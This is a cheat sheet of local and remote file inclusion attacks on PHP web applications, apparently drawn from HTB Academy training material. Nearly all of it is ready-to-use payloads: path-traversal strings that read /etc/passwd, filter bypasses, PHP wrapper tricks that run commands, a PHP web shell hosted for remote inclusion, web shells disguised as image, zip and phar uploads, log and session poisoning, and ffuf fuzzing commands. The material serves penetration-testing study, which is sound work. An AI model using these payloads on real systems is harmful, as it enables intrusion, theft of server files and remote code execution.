File Inclusion – Cheat Sheet

by
Sharing is caring

Views: 28

Local File Inclusion

CommandDescription
 Basic LFI
 /index.php?language=/etc/passwdBasic LFI
 /index.php?language=../../../../etc/passwdLFI with path traversal
 /index.php?language=/../../../etc/passwdLFI with name prefix
 /index.php?language=./languages/../../../../etc/passwdLFI with approved path
 LFI Bypasses
 /index.php?language=....//....//....//....//etc/passwdBypass basic path traversal filter
 /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64Bypass filters with URL encoding
 /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]Bypass appended extension with path truncation (obsolete)
 /index.php?language=../../../../etc/passwd%00Bypass appended extension with null byte (obsolete)
 /index.php?language=php://filter/read=convert.base64-encode/resource=configRead PHP with base64 filter

Remote Code Execution

CommandDescription
 PHP Wrappers
 /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=idRCE with data wrapper
 curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"RCE with input wrapper
 curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"RCE with expect wrapper
 RFI
 echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>Host web shell
 /index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=idInclude remote PHP web shell
 LFI + Upload
 echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gifCreate malicious image
 /index.php?language=./profile_images/shell.gif&cmd=idRCE with malicious uploaded image
 echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.phpCreate malicious zip archive ‘as jpg’
 /index.php?language=zip://shell.zip%23shell.php&cmd=idRCE with malicious uploaded zip
 php --define phar.readonly=0 shell.php && mv shell.phar shell.jpgCreate malicious phar ‘as jpg’
 /index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=idRCE with malicious uploaded phar
 Log Poisoning
 /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsdRead PHP session parameters
 /index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3EPoison PHP session with web shell
 /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=idRCE through poisoned PHP session
 curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'Poison server log
 /index.php?language=/var/log/apache2/access.log&cmd=idRCE through poisoned PHP session

Misc

CommandDescription
 ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287Fuzz page parameters
 ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287Fuzz LFI payloads
 ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287Fuzz webroot path
 ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287Fuzz server configurations
 LFI Wordlists
LFI-Jhaddix.txt
Webroot path wordlist for Linux
Webroot path wordlist for Windows
Server configurations wordlist for Linux
Server configurations wordlist for Windows

File Inclusion Functions

FunctionRead ContentExecuteRemote URL
PHP
include()/include_once()
require()/require_once()
file_get_contents()
fopen()/file()
NodeJS
fs.readFile()
fs.sendFile()
res.render()
Java
include
import
.NET
@Html.Partial()
@Html.RemotePartial()
Response.WriteFile()
include
Reference: HTB Academy